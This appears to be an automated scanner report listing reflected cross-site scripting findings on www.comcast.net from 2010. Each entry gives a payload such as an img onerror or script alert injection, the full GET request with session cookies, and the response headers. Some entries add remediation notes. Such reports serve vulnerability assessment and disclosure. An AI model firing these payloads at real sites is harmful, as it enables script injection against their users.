HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:42 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:42 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56000
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31d78"%3bf24acd488c8 was submitted in the REST URL parameter 2. This input was echoed as 31d78";f24acd488c8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/sports-mlb31d78"%3bf24acd488c8/20101219/wise-greinketraded/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:41 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:41 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56012
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9d89<img%20src%3da%20onerror%3dalert(1)>a003304798 was submitted in the REST URL parameter 2. This input was echoed as b9d89<img src=a onerror=alert(1)>a003304798 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /articles/sports-nflb9d89<img%20src%3da%20onerror%3dalert(1)>a003304798/20101219/Jaguars-Colts.Inactives/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:50 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c4d"%3b7eb771f3fbf was submitted in the REST URL parameter 2. This input was echoed as 30c4d";7eb771f3fbf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/sports-nfl30c4d"%3b7eb771f3fbf/20101219/Jaguars-Colts.Inactives/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:43 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:43 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b123'%3bc5f8a8bc2aa was submitted in the REST URL parameter 2. This input was echoed as 4b123';c5f8a8bc2aa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/sports-nfl4b123'%3bc5f8a8bc2aa/20101219/Jaguars-Colts.Inactives/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:44 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:44 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Vary: Accept-Encoding Date: Sun, 19 Dec 2010 18:18:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 56123
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload d868f--><img%20src%3da%20onerror%3dalert(1)>5e235b0f13a was submitted in the REST URL parameter 2. This input was echoed as d868f--><img src=a onerror=alert(1)>5e235b0f13a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /entertainment/reelnewsd868f--><img%20src%3da%20onerror%3dalert(1)>5e235b0f13a HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:01 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:01 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6cf7<img%20src%3da%20onerror%3dalert(1)>e7ac8a1e642 was submitted in the REST URL parameter 2. This input was echoed as a6cf7<img src=a onerror=alert(1)>e7ac8a1e642 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /entertainment/reelnewsa6cf7<img%20src%3da%20onerror%3dalert(1)>e7ac8a1e642 HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:54 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:54 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:18:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8d2"><script>alert(1)</script>befae20f7ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /entertainment/reelnewsfb8d2"><script>alert(1)</script>befae20f7ae HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:43 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:43 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:18:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload c6f94--><img%20src%3da%20onerror%3dalert(1)>39e088bf6ea was submitted in the REST URL parameter 2. This input was echoed as c6f94--><img src=a onerror=alert(1)>39e088bf6ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /finance/forwhatitsworthc6f94--><img%20src%3da%20onerror%3dalert(1)>39e088bf6ea/6470358/outrageousceoperksthisyearstoppicks/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:11 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:11 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 145978
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3bdd0<img%20src%3da%20onerror%3dalert(1)>d9e3b3a0d20 was submitted in the REST URL parameter 2. This input was echoed as 3bdd0<img src=a onerror=alert(1)>d9e3b3a0d20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /finance/forwhatitsworth3bdd0<img%20src%3da%20onerror%3dalert(1)>d9e3b3a0d20/6470358/outrageousceoperksthisyearstoppicks/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:07 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:07 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 145909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af101<img%20src%3da%20onerror%3dalert(1)>df8f6893f8b was submitted in the REST URL parameter 2. This input was echoed as af101<img src=a onerror=alert(1)>df8f6893f8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /finance/taxcenteraf101<img%20src%3da%20onerror%3dalert(1)>df8f6893f8b/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:50 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:18:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 145515
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload af54b--><img%20src%3da%20onerror%3dalert(1)>653cf74b701 was submitted in the REST URL parameter 2. This input was echoed as af54b--><img src=a onerror=alert(1)>653cf74b701 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /finance/taxcenteraf54b--><img%20src%3da%20onerror%3dalert(1)>653cf74b701/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:18:53 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:23:53 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:18:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 145584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6fbe"><img%20src%3da%20onerror%3dalert(1)>af36ff5364e was submitted in the REST URL parameter 2. This input was echoed as b6fbe"><img src=a onerror=alert(1)>af36ff5364e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /local/19103b6fbe"><img%20src%3da%20onerror%3dalert(1)>af36ff5364e/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:47 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:47 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:47 GMT Content-Length: 28243 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 13854--><img%20src%3da%20onerror%3dalert(1)>2c2f086376f was submitted in the REST URL parameter 2. This input was echoed as 13854--><img src=a onerror=alert(1)>2c2f086376f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /news/national13854--><img%20src%3da%20onerror%3dalert(1)>2c2f086376f/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:35 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:35 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1613b<img%20src%3da%20onerror%3dalert(1)>ca95b061931 was submitted in the REST URL parameter 2. This input was echoed as 1613b<img src=a onerror=alert(1)>ca95b061931 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /news/national1613b<img%20src%3da%20onerror%3dalert(1)>ca95b061931/ HTTP/1.1 Host: www.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 19 Dec 2010 18:19:30 GMT Cache-Control: max-age=300 Expires: Sun, 19 Dec 2010 18:24:30 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Sun, 19 Dec 2010 18:19:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 154647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
